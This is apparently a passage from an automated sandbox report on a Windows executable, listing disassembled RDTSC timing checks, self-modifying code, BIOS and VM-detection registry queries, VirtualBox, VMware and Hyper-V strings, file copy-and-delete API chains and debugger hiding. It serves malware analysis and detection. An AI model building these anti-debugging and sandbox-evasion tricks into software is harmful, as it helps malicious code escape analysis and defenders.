                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B403 second address: 79B442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FD3C522448Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FD3C522448Ch 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FD3C5224491h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7991FC second address: 799216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E1h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799216 second address: 79921C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79921C second address: 799256 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3C500B9D6h 0x00000008 jmp 00007FD3C500B9E8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push ebx 0x00000011 jbe 00007FD3C500B9DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FD3C500B9D6h 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CC7 second address: 7A2CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FD3C5224486h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CD9 second address: 7A2CE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CE9 second address: 7A2CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CEF second address: 7A2CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28A6 second address: 7A28AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28AC second address: 7A28B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28B8 second address: 7A28BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28BC second address: 7A28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3C500B9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD3C500B9D8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2A2C second address: 7A2A32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2A32 second address: 7A2A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2A38 second address: 7A2A4E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD3C5224491h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF6F5 second address: 7AF6FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF278 second address: 7AF27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B226C second address: 7B2281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2281 second address: 7B2289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1DEC second address: 7B1DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1F94 second address: 7B1FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD3C522448Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8E7B second address: 7B8E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8E7F second address: 7B8E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD3C522448Ch 0x0000000c jnc 00007FD3C5224486h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8E91 second address: 7B8EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C500B9E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8EAC second address: 7B8EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1A02 second address: 7C1A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1A0A second address: 7C1A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FD3C5224486h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1A1A second address: 7C1A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD3C500B9EFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1A41 second address: 7C1A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C18A5 second address: 7C18AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C18AF second address: 7C18B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3003 second address: 7C3019 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jne 00007FD3C500B9D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C54B0 second address: 7C54CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224498h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD0FC second address: 7CD100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBA62 second address: 7CBA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBBB4 second address: 7CBBDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FD3C500B9D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBBDB second address: 7CBC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224491h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3C522448Eh 0x00000012 jl 00007FD3C5224486h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC08 second address: 7CBC12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC079 second address: 7CC07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC07D second address: 7CC0A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD3C500B9E9h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D30BA second address: 7D30C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D30C2 second address: 7D30C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2DE4 second address: 7D2E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224496h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2E02 second address: 7D2E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE699 second address: 7DE69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE69D second address: 7DE6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6A1 second address: 7DE6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FD3C5224486h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FD3C5224490h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD3C522448Dh 0x0000001e jnp 00007FD3C5224486h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE530 second address: 7DE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3C500B9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE53A second address: 7DE550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 jo 00007FD3C5224486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE550 second address: 7DE555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE555 second address: 7DE55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2446 second address: 7E2456 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2456 second address: 7E245C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E245C second address: 7E2460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2460 second address: 7E2466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E228D second address: 7E22EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jng 00007FD3C500B9D6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ebx 0x00000019 jmp 00007FD3C500B9DDh 0x0000001e jmp 00007FD3C500B9E3h 0x00000023 pop ebx 0x00000024 jns 00007FD3C500B9E2h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E22EE second address: 7E22F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEB90 second address: 7EEB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD3C500B9D6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0B2E second address: 7F0B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F081B second address: 7F0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0839 second address: 7F0855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C5224498h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800682 second address: 80068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80068A second address: 800690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800690 second address: 800694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFE93 second address: 7FFEBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD3C5224486h 0x00000009 jp 00007FD3C5224486h 0x0000000f jmp 00007FD3C5224493h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEBA second address: 7FFEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FD3C500B9EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEE2 second address: 7FFEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFEE8 second address: 7FFEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800081 second address: 800099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FD3C5224488h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FD3C522448Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800099 second address: 80009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80009F second address: 8000AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C522448Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8000AF second address: 8000B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8000B5 second address: 8000C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD3C5224486h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8062B4 second address: 8062CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E3A second address: 807E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E40 second address: 807E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD3C500B9E8h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E62 second address: 807E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FD3C522448Eh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E7D second address: 807E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 807E85 second address: 807E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 581C1C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 581B47 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 57F53E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A87F0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00334910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0032DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0032E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0032ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00334570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0032BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0032F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00333EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321160 GetSystemInfo,ExitProcess,0_2_00321160
                Source: file.exe, file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware\
                Source: file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.00000000010F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13286
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13337
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13283
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13297
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13305
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
